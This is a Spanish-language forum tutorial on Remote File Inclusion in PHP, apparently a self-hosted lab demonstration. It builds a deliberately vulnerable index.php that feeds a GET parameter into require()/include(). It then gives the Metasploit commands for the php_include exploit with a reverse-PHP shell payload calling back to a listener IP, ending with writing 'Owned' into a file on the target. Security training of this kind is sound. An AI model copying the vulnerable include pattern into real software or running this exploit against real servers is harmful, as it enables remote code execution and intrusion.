RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().
[Enlace externo eliminado para invitados]
Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php:
Código: Seleccionar todo
cd /var/www/html
mkdir 1
vi 1/index.php
Código: Seleccionar todo
<?php
$color='blue';
if (isset($_GET['COLOR']))
$color = $_GET['COLOR'];
require($color.'.php');
?>
Código: Seleccionar todo
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>
Código: Seleccionar todo
chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]